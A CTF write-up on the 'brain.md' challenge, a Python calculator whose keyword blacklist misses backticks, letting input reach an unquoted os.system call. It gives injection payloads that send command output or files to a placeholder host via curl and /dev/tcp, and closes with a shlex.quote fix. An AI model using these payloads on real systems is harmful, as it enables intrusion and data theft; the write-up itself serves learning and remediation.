0x00 Preface
I barely looked at this challenge during the competition.
upgdstore felt close to done, so I wanted to gamble on it, but it still flopped...
Making up for it now.
0x01 brain.md
A very ordinary calculator.
They kindly provided the source code:
# coding=utf-8
from flask import Flask, render_template, url_for, render_template_string, redirect, request, current_app, session, \
    abort, send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time


def waf(s):
    # Keyword blacklist applied to the submitted expression; note that the backtick is not in it
    blacklist = ['import', '(', ')', ' ', '_', '|', ';', '"', '{', '}', '&', 'getattr', 'os', 'system', 'class',
                 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'subprocess', 'file', 'open', 'popen',
                 'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self', 'item', 'getitem',
                 'getattribute', 'func_globals', '__init__', 'join', '__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag = False
            print(no)
            break
    return flag


while True:
    num = input("num>>>")
    # ip is not defined in this excerpt (it comes from the request in the full challenge);
    # the raw expression is interpolated, unquoted, into a shell command line
    log = "echo {0} {1} {2}> /tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip, num)
    if waf(num):
        try:
            data = eval(num)
            os.system(log)  # the shell parses everything in num, including `...`
        except:
            print(data)
            pass
    else:
        print("waf!!")
A lot is banned at the eval, but backticks are not.
Also note the os.system(log) below it: commands can be executed there.
If you are not familiar with this, set it up locally and experiment first.
Python eval:
https://blog.csdn.net/qq_26442553/article/details/94396532
# coding=utf-8
from flask import Flask, render_template, url_for, render_template_string, redirect, request, current_app, session, \
    abort, send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time


def waf(s):
    blacklist = ['import', '(', ')', ' ', '_', '|', ';', '"', '{', '}', '&', 'getattr', 'os', 'system', 'class',
                 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'subprocess', 'file', 'open', 'popen',
                 'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self', 'item', 'getitem',
                 'getattribute', 'func_globals', '__init__', 'join', '__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag = False
            print(no)
            break
    return flag


# Local test harness: same logic as the challenge, without the ip field,
# and with the exception printed so syntax errors from eval are visible
while True:
    num = input("num>>>")
    log = "echo {0} {1} > /tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), num)
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except (Exception, BaseException) as e:
            print(e)
            pass
    else:
        print("waf!!")
bash expands it directly:
root@LAPTOP-RDTNMS90:/mnt/f/工具/工具/dirsearch/dirsearch-master# echo 1+1`ls`
1+1CHANGELOG.md CONTRIBUTORS.md db default.conf dirsearch.py Dockerfile lib logs README.md reports requirements.txt
To avoid a syntax error in Python's eval, prepend the comment character #:
num>>>1+1`ls`
invalid syntax (<string>, line 1)
num>>>1+1#`ls`
num>>>
One approach is out-of-band exfiltration, the other is to send the output back directly.
They are essentially the same:
execute first, then exfiltrate and look at the result.
1+1#`ls`
1+1#`curl -X GET -F xx=@tmp/log.txt http://ip:port/`
1%2b1%23`cat%09T*`
The other approach sends the output back directly; when testing locally the shell must be bash (zsh errors out):
1%2b1%23`ls>/dev/tcp/ip/port`
1%2b1%23`cat%09T*>/dev/tcp/ip/port`
Looking back at the original command,
ls>/dev/tcp/ip/port is executed inline:
echo 1+1#`ls>/dev/tcp/ip/port` >/tmp/log.txt
In this case log.txt will not contain the result of the inline execution.
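As an added example (not code from the writeup or the challenge), here is the challenge's log line rebuilt so the submitted expression can no longer reach the shell: once quoted with shlex.quote, and once written straight from Python with no shell at all. The IP address, log path and sample expression are constructed values.

```python
# Added example, not part of the original writeup. The challenge interpolates the raw
# expression into os.system(), so a value like 1+1#`ls` is parsed by the shell. The two
# alternatives below record the same value as text instead of executing it.
import os
import shlex
import subprocess
import tempfile
import time
from pathlib import Path


def timestamp():
    return time.strftime("%Y%m%d-%H%M%S", time.localtime())


def vulnerable_log_command(ip, num, path="/tmp/log.txt"):
    """Pattern from the challenge: num is unquoted, so `...`, $(...), > and ; are live shell syntax."""
    return "echo {0} {1} {2}> {3}".format(timestamp(), ip, num, path)


def quoted_log_command(ip, num, path="/tmp/log.txt"):
    """Each field goes through shlex.quote(), so the shell sees one literal word per field."""
    return "echo {0} {1} {2} > {3}".format(
        shlex.quote(timestamp()), shlex.quote(ip), shlex.quote(num), shlex.quote(path))


def write_log_line(ip, num, path):
    """Preferred fix: no shell at all. Python appends the line itself and returns what it wrote."""
    line = "{0} {1} {2}\n".format(timestamp(), ip, num)
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(line)
    return line


def run_quoted_demo(ip="198.51.100.7", num="1+1#`ls`"):
    """Runs the quoted command through /bin/sh into a temp file and returns the file content."""
    with tempfile.TemporaryDirectory() as tmp:
        log = Path(tmp) / "log.txt"
        subprocess.run(quoted_log_command(ip, num, str(log)), shell=True, check=True)
        return log.read_text(encoding="utf-8")


if __name__ == "__main__":
    # constructed inputs: a placeholder client address and the writeup's backtick expression
    print(vulnerable_log_command("198.51.100.7", "1+1#`ls`"))
    print(quoted_log_command("198.51.100.7", "1+1#`ls`"))
    print(run_quoted_demo(), end="")
    print(write_log_line("198.51.100.7", "1+1#`ls`", os.devnull), end="")
```

The quoted variant stores the literal text 1+1#`ls` in the log, and no directory listing is produced; the direct write avoids the shell entirely and is the version to prefer.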
0x02 Rethink
Talk less, solve more problems.